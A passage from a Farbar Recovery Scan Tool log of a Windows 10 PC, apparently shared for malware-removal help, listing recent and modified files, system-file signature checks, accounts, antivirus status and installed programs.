C:\Users\Charlie\Downloads\viewDownload.go 2017-10-25 13:41 - 2017-10-25 13:41 - 000000000 ____D C:\Program Files (x86)\Dell Customer Connect 2017-10-24 09:46 - 2017-10-24 09:46 - 000210369 _____ C:\Users\Charlie\Downloads\YearEndSummary_2017(1).pdf 2017-10-24 09:37 - 2017-10-24 09:37 - 000210358 _____ C:\Users\Charlie\Downloads\YearEndSummary_2017.pdf 2017-10-24 09:36 - 2017-10-24 09:36 - 000146457 _____ C:\Users\Charlie\Downloads\YearEndSummary_2016.pdf 2017-10-24 09:33 - 2017-10-24 09:33 - 000514225 _____ C:\Users\Charlie\Downloads\retrievedocument.pdf 2017-10-24 09:24 - 2017-11-01 09:55 - 000031361 _____ C:\Users\Charlie\Desktop\Checks 1000.xlsx 2017-10-20 14:00 - 2017-10-20 14:00 - 000028249 _____ C:\Users\Charlie\Documents\IMG_20171020_0001.pdf 2017-10-20 13:44 - 2017-10-20 13:44 - 000209448 _____ C:\Users\Charlie\Downloads\birth cert appl_20170627.pdf 2017-10-20 06:24 - 2017-10-20 06:24 - 000402608 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\avgBoot.exe 2017-10-17 19:52 - 2017-10-17 19:52 - 000096098 _____ C:\Users\Charlie\Downloads\amsler_grid_eye_test.pdf 2017-10-17 07:02 - 2017-10-17 07:03 - 001361928 _____ C:\Users\Charlie\Downloads\ElfPDFStream (2).pdf ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2017-11-13 09:27 - 2016-01-19 12:43 - 000000000 ___RD C:\Users\Charlie\Desktop\Security & Utilities 2017-11-13 09:24 - 2017-03-18 06:40 - 001310720 _____ C:\WINDOWS\system32\config\BBI 2017-11-13 09:23 - 2017-09-02 03:05 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2017-11-13 09:09 - 2017-10-07 21:09 - 000094144 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys 2017-11-12 21:50 - 2017-09-02 02:42 - 000954570 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2017-11-12 21:50 - 2017-09-02 02:41 - 000000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat 2017-11-12 21:50 - 2016-01-19 08:44 - 000000000 __SHD C:\Users\Charlie\IntelGraphicsProfiles 2017-11-12 21:47 - 2017-09-02 03:05 - 000003668 _____ C:\WINDOWS\System32\Tasks\AVG EUpdate Task 2017-11-12 21:46 - 2017-10-07 21:09 - 000252232 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys 2017-11-12 21:46 - 2017-10-07 21:09 - 000045504 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys 2017-11-12 21:46 - 2017-08-28 13:43 - 000110016 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys 2017-11-12 21:03 - 2017-09-15 14:21 - 000000000 ____D C:\AdwCleaner 2017-11-12 20:20 - 2017-09-02 03:05 - 000004162 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{24F6DFAD-F03B-41A2-9438-15B6B73060F2} 2017-11-12 20:17 - 2017-09-02 02:39 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2017-11-12 17:06 - 2016-01-19 09:10 - 000000008 __RSH C:\ProgramData\ntuser.pol 2017-11-12 17:03 - 2016-01-19 12:32 - 000000000 ____D C:\Users\Charlie\AppData\LocalLow\Temp 2017-11-12 17:02 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy 2017-11-12 17:02 - 2009-07-13 22:20 - 000000000 ___HD C:\WINDOWS\system32\GroupPolicy 2017-11-11 22:09 - 2016-01-19 12:36 - 000000000 ____D C:\Users\Charlie\Documents\My Data Sources 2017-11-11 19:30 - 2017-02-13 08:52 - 000000000 ____D C:\Users\Charlie\Desktop\Noplock Contacts 2017-11-11 17:33 - 2017-03-18 16:03 - 000000000 ___HD C:\Program Files\WindowsApps 2017-11-11 17:33 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\AppReadiness 2017-11-10 18:35 - 2017-09-02 02:43 - 000000000 ____D C:\Users\Charlie 2017-11-10 12:05 - 2016-01-19 12:37 - 000000000 ____D C:\Users\Charlie\Documents\Outlook Files 2017-11-10 06:47 - 2017-03-18 16:03 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2017-11-10 06:40 - 2015-11-09 23:03 - 000000000 ____D C:\Program Files (x86)\Microsoft Office 2017-11-09 14:39 - 2016-01-19 08:44 - 000000000 ____D C:\Users\Charlie\AppData\Local\Packages 2017-11-09 11:38 - 2016-01-19 12:43 - 000000000 ____D C:\Users\Charlie\Desktop\MRN 2017-11-09 08:45 - 2016-01-19 12:36 - 000000000 ____D C:\Users\Charlie\Documents\Faith 2017-11-07 09:39 - 2017-03-18 16:01 - 000000000 ____D C:\WINDOWS\INF 2017-11-06 21:03 - 2017-06-04 09:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG 2017-11-06 20:53 - 2016-11-19 08:51 - 000000000 ____D C:\Users\Charlie\AppData\LocalLow\Mozilla 2017-11-06 20:48 - 2016-01-19 12:36 - 000000000 ____D C:\Users\Charlie\Documents\Finances 2017-11-04 21:22 - 2016-01-19 12:37 - 000000000 ____D C:\Users\Charlie\Documents\Retire 2017-11-04 07:42 - 2016-01-19 12:36 - 000000000 ____D C:\Users\Charlie\Documents\Farm 2017-11-01 20:49 - 2017-09-02 03:05 - 000003372 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1808445638-3246226358-2469192111-1000 2017-11-01 20:49 - 2016-01-19 08:47 - 000002417 _____ C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2017-11-01 20:49 - 2016-01-19 08:47 - 000000000 ___RD C:\Users\Charlie\OneDrive 2017-11-01 19:36 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\LiveKernelReports 2017-10-30 08:51 - 2016-01-19 12:40 - 000000000 ____D C:\Users\Charlie\AppData\Local\ElevatedDiagnostics 2017-10-29 23:33 - 2017-10-12 14:12 - 000000000 ____D C:\Program Files\Mozilla Firefox 2017-10-29 23:33 - 2016-01-19 12:25 - 000000000 ____D C:\Program Files (x86)\Java 2017-10-29 23:33 - 2016-01-19 09:16 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2017-10-26 18:32 - 2017-06-04 08:47 - 001022288 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgsnx.sys 2017-10-25 16:45 - 2016-01-19 12:22 - 000000000 ____D C:\ProgramData\Oracle 2017-10-25 16:36 - 2016-01-19 12:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java 2017-10-25 16:33 - 2017-05-10 11:54 - 000097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll 2017-10-25 13:41 - 2015-11-09 22:54 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell 2017-10-25 08:06 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed 2017-10-25 08:06 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\system32\Macromed 2017-10-23 06:31 - 2016-01-19 12:37 - 000000000 ____D C:\Users\Charlie\Documents\Quicken 2017-10-20 06:25 - 2017-09-02 03:05 - 000004008 _____ C:\WINDOWS\System32\Tasks\Antivirus Emergency Update 2017-10-20 06:24 - 2017-06-04 08:47 - 000579584 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgSP.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000548568 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgNetSec.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000355856 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgVmm.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000336896 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbloga.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000314640 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsdrivera.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000193768 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgStm.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000192584 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsha.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000166624 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbdiska.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000140192 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgMonFlt.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000102792 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRdr2.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000076832 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRvrt.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000051336 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbuniva.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000039424 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgHwid.sys 2017-10-20 06:24 - 2016-01-19 12:21 - 000000000 ____D C:\ProgramData\AVG 2017-10-18 09:00 - 2017-03-18 15:51 - 000000000 ____D C:\WINDOWS\CbsTemp ==================== Files in the root of some directories ======= 2016-12-01 12:59 - 2016-11-30 12:02 - 000012542 _____ () C:\Program Files (x86)\Common Files\client.wyc 2014-07-09 18:03 - 2016-01-21 15:23 - 021401112 _____ (LastPass) C:\Program Files (x86)\Common Files\lpuninstall.exe 2014-07-11 08:11 - 2014-07-11 10:57 - 000037663 _____ () C:\Users\Charlie\AppData\Roaming\Microsoft Excel 97-2003.ADR 2017-09-02 02:41 - 2017-09-02 02:41 - 000000000 ____H () C:\ProgramData\DP45977C.lfl 2014-07-15 11:54 - 2016-11-21 15:21 - 000000934 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc 2017-09-27 06:24 - 2017-10-01 08:12 - 000000274 _____ () C:\ProgramData\ResPntListUNI.txt Files to move or delete: ==================== C:\Users\Charlie\hpbcfgre.dll C:\Users\Charlie\hpbuio32.dll C:\Users\Charlie\hpbuio64.dll C:\Users\Charlie\hpbuiodm64.dll C:\Users\Charlie\hpmco175.dll C:\Users\Charlie\hpmews02.dll C:\Users\Charlie\hpmldm02.dll C:\Users\Charlie\hpmprein.dll C:\Users\Charlie\Install.dll C:\Users\Charlie\Install.exe C:\Users\Charlie\MRNOFXLOG.DAT C:\Users\Charlie\mrn_SyncLog.dat Some files in TEMP: ==================== 2017-11-12 21:09 - 2017-09-05 00:26 - 001930840 _____ (Microsoft Corporation) C:\Users\Charlie\AppData\Local\Temp\dllnt_dump.dll ==================== Bamital & volsnap ====================== (There is no automatic fix for files that do not pass verification.) C:\WINDOWS\system32\winlogon.exe => File is digitally signed C:\WINDOWS\system32\wininit.exe => File is digitally signed C:\WINDOWS\explorer.exe => File is digitally signed C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed C:\WINDOWS\system32\svchost.exe => File is digitally signed C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed C:\WINDOWS\system32\services.exe => File is digitally signed C:\WINDOWS\system32\User32.dll => File is digitally signed C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed C:\WINDOWS\system32\userinit.exe => File is digitally signed C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed C:\WINDOWS\system32\rpcss.dll => File is digitally signed C:\WINDOWS\system32\dnsapi.dll => File is digitally signed C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2017-11-11 09:42 ==================== End of FRST.txt ============================ Additional scan result of Farbar Recovery Scan Tool (x64) Version: 12-11-2017 03 Ran by Charlie (13-11-2017 09:28:48) Running from C:\Users\Charlie\Desktop Windows 10 Pro Version 1703 15063.674 (X64) (2017-09-02 08:16:44) Boot Mode: Safe Mode (with Networking) ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-1808445638-3246226358-2469192111-500 - Administrator - Disabled) Charlie (S-1-5-21-1808445638-3246226358-2469192111-1000 - Administrator - Enabled) => C:\Users\Charlie DefaultAccount (S-1-5-21-1808445638-3246226358-2469192111-503 - Limited - Disabled) Guest (S-1-5-21-1808445638-3246226358-2469192111-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-1808445638-3246226358-2469192111-1002 - Limited - Enabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B} AV: AVG Antivirus (Disabled - Out of date) {4D41356F-32AD-7C42-C820-63775EE4F413} AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: AVG Antivirus (Disabled - Out of date) {F620D48B-1497-73CC-F290-58052563BEAE} FW: AVG Antivirus (Disabled) {757AB44A-78C2-7D1A-E37F-CA42A037B368} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) 64 Bit HP CIO Components Installer (HKLM\...\{30689060-43BD-46E9-8A54-E6CDB18AAB88}) (Version: 20.2.1 - HP Inc.) Hidden 7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov) Active@ KillDisk 10 (HKLM\...\{6A633DB7-06E4-4EF1-8FD1-7F8812C590AD}_is1) (Version: 10 - LSoft Technologies Inc) Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.012.20098 - Adobe Systems Incorporated) Adobe Flash Player 27 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 27.0.0.183 - Adobe Systems Incorporated) Adobe Reader XI (11.0.20) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.20 - Adobe Systems Incorporated) ANT Drivers Installer x64 (HKLM\...\{7664AF65-7B0D-4171-9F0F-50455278B428}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden AVG (HKLM\...\{E61E6143-4937-43FC-8C12-06B8A987484D}) (Version: 1.211.3 - AVG Technologies) Hidden AVG Internet Security (HKLM-x32\...\AVG Antivirus) (Version: 17.7.3032 - AVG Technologies) AVG PC TuneUp (HKLM-x32\...\{A3DEEC4D-7D8A-465E-90BD-B853A19DDF82}) (Version: 16.75.1 - AVG Technologies) Hidden AVG PC TuneUp (HKLM-x32\...\AVG PC TuneUp) (Version: 16.75.3.10304 - AVG Technologies) AVS Document Converter 2.3.1 (HKLM-x32\...\AVS Document Converter_is1) (Version: 2.3.1.232 - Online Media Technologies Ltd.) AVS Photo Editor 2.2.1.140 (HKLM-x32\...\AVS Photo Editor_is1) (Version: 2.2.1.140 - Online Media Technologies Ltd.) Canon CanoScan LiDE 220 On-screen Manual (HKLM-x32\...\Canon CanoScan LiDE 220 On-screen Manual) (Version: 7.7.0 - Canon Inc.) Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.11.1 - Canon Inc.) Canon LiDE 220 User Registration (HKLM-x32\...\Canon LiDE 220 User Registration) (Version: - Canon Inc.) Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 3.0.0 - Canon Inc.) Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 3.0.0 - Canon Inc.) Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.4.0 - Canon Inc.) CanoScan LiDE 220 Scanner Driver (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_CNQ4811) (Version: 1.00 - Canon Inc.) CCleaner (HKLM\...\CCleaner) (Version: 5.25 - Piriform) Cisco Connect (HKLM-x32\...\Cisco Connect) (Version: 1.4.12068.0 - Cisco Consumer Products LLC) Cisco WebEx Meetings (HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\ActiveTouchMeetingClient) (Version: - Cisco WebEx LLC) Citrix Online Launcher (HKLM-x32\...\{DB014C85-A264-4BCA-A66F-6DD1FCF8EC36}) (Version: 1.0.335 - Citrix) Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.9.2.8 - Dell Inc.) Dell Customer Connect (HKLM-x32\...\{04A41EBC-AB30-4574-A14D-E0CDFE31AB70}) (Version: 1.5.1.0 - Dell Inc.) Dell Data Vault (HKLM\...\{2E55EEFD-2162-4A7D-9158-EDB0305603A6}) (Version: 4.3.7.0 - Dell Inc.) Hidden Dell Digital Delivery (HKLM-x32\...\{693A23FB-F28B-4F7A-A720-4C1263F97F43}) (Version: 3.1.1002.0 - Dell Products, LP) Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc) Dell Foundation Services (HKLM\...\{BDB50421-E961-42F3-B803-6DAC6F173834}) (Version: 3.4.16100.0 - Dell Inc.) Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 1.3.6855.61 - Dell) Dell SupportAssistAgent (HKLM-x32\...\{3ED468C2-2235-4747-90AD-A7A34F0FE70A}) (Version: 1.2.2.8 - Dell) Dell System Detect (HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\58d94f3ce2c27db0) (Version: 7.11.0.6 - Dell) Dell Update - SupportAssist Update Plugin (HKLM\...\{2228BC43-73DA-4F9A-BEE6-8E9C15328513}) (Version: 3.1.1.3832 - Dell Inc.) Dell Update (HKLM-x32\...\{F91263FA-BE4D-439D-9C0A-2E7204E0E9E3}) (Version: 1.9.20.0 - Dell Inc.) Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Dell Inc.) Dropbox 20 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 1.0.8.0 - Dropbox, Inc.) Duplicate Photo Cleaner (HKLM\...\Duplicate Photo Cleaner_is1) (Version: - WebMinds, Inc.) EaseUS Partition Master 12.5 Trial Edition (HKLM-x32\...\EaseUS Partition Master Trial Edition_is1) (Version: - EaseUS) EasyDuplicateFinder v4.7 (HKLM\...\Easy Duplicate Finder 4_is1) (Version: - WebMinds, Inc.) Elevated Installer (HKLM-x32\...\{1052502B-4C91-43F9-B160-AE39ED57C9F0}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries) Hidden FMW 1 (HKLM\...\{36133E9F-B129-4206-9FB4-13F707787542}) (Version: 1.226.3 - AVG Technologies) Hidden Garmin Express (HKLM-x32\...\{BCC7CA85-E57F-452D-BB44-15A1CE018BD0}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries) Hidden Garmin Express (HKLM-x32\...\{bd8bd200-9a60-4969-b267-6b565f36e3da}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries) Garmin Express Tray (HKLM-x32\...\{DA9C865D-6762-4931-8588-0B13B7A0796B}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries) Hidden Google Chrome (HKLM-x32\...\Google Chrome) (Version: 61.0.3163.100 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden HydraVision (HKLM-x32\...\{65589581-920C-CAE1-58C2-2149D3AA3F39}) (Version: 4.2.180.0 - ATI Technologies Inc.) Hidden Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.7.3.1001 - Intel Corporation) Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation) iSEEK AnswerWorks English Runtime (HKLM-x32\...\{18A8E78B-9EF2-496E-B310-BCD8E4C1DAB3}) (Version: 010.000.0101 - Vantage Linguistics) Java 8 Update 151 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180151F0}) (Version: 8.0.1510.12 - Oracle Corporation) Laplink PCmover Professional (HKLM-x32\...\{99ADB194-BAD6-4787-AC22-A8E4A8346166}) (Version: 10.00.639 - Laplink Software, Inc.) LastPass (uninstall only) (HKLM-x32\...\LastPass) (Version: - LastPass) Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech) Malwarebytes version 3.2.2.2018 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.2.2.2018 - Malwarebytes) Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 16.0.8625.2121 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\OneDriveSetup.exe) (Version: 17.3.7076.1026 - Microsoft Corporation) Microsoft OneNote Home and Student 2016 - en-us (HKLM\...\OneNoteFreeRetail - en-us) (Version: 16.0.8625.2121 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106 (HKLM-x32\...\{8e70e4e1-06d7-470b-9f74-a51bef21088e}) (Version: 11.0.51106.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) Mozilla Firefox 56.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 56.0 (x86 en-US)) (Version: 56.0 - Mozilla) Mozilla Firefox 56.0.2 (x64 en-US) (HKLM\...\Mozilla Firefox 56.0.2 (x64 en-US)) (Version: 56.0.2 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 56.0.1 - Mozilla) Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.8625.2121 - Microsoft Corporation) Hidden Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.8625.2121 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.8625.2121 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.8326.2107 - Microsoft Corporation) Hidden Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.330 - Qualcomm Atheros Communications) Quicken 2015 (HKLM-x32\...\{00C2D443-43D9-4550-ABEA-318288E23E57}) (Version: 24.1.15.10 - Intuit) Quicken WillMaker Plus 2014 (HKLM-x32\...\{44160FDE-C190-45C1-B8E1-23F00228E572}) (Version: 1.0.0.0 - Nolo) Rapport (HKLM-x32\...\{1DD81E7D-0D28-4CEB-87B2-C041A4FCB215}) (Version: 3.5.1804.161 - Trusteer) Hidden Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10125.31214 - Realtek Semiconductor Corp.) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7544 - Realtek Semiconductor Corp.) Seagate Dashboard (HKLM-x32\...\{EA266F00-A8E7-43A0-8DED-FBFE3F076934}) (Version: 4.2.002.0 - Seagate) TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version: - TechPowerUp) Trusteer Endpoint Protection (HKLM-x32\...\Rapport_msi) (Version: 3.5.1804.161 - Trusteer) TurboTax 2014 (HKLM-x32\...\TurboTax 2014) (Version: 2014.0 - Intuit, Inc) TurboTax 2015 (HKLM-x32\...\TurboTax 2015) (Version: 2015.0 - Intuit, Inc) TurboTax 2016 (HKLM-x32\...\TurboTax 2016) (Version: 2016.0 - Intuit, Inc) Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 4.0.4 - Tweaking.com) Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies) Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.) Windows 10 Update and Privacy Settings (HKLM\...\{4DFCD818-036A-4229-A67D-CF17DC461D92}) (Version: 1.0.14.0 - Microsoft Corporation) Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22243 - Microsoft Corporation) Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.) Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software) ZBot Trojan Remover v1.9.2 (HKLM-x32\...\ZBot Trojan Remover_is1) (Version: 1.9.2.0 - NoVirusThanks Company Srl) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) ContextMenuHandlers1: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files (x86)\AVG\Antivirus\ashShA64.dll [2017-10-20] (AVG Technologies CZ, s.r.o.) ContextMenuHandlers1: [AVG Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => C:\Program Files (x86)\AVG\AVG PC TuneUp\SDShelEx-x64.dll [2017-07-26] (AVG Technologies CZ, s.r.o.) ContextMenuHandlers1: [ShellConverter] -> {30A4E07E-068A-4d91-8F05-691283A1336B} => C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSShellConverter64.dll [2013-05-27] (Online Media Technologies Ltd.) ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-08-21] (Malwarebytes) ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) ContextMenuHandlers4: [AVG Disk Space Explorer Shell Extension] -> {4838CD50-7E5D-4811-9B17-C47A85539F28} => C:\Program Files (x86)\AVG\AVG PC 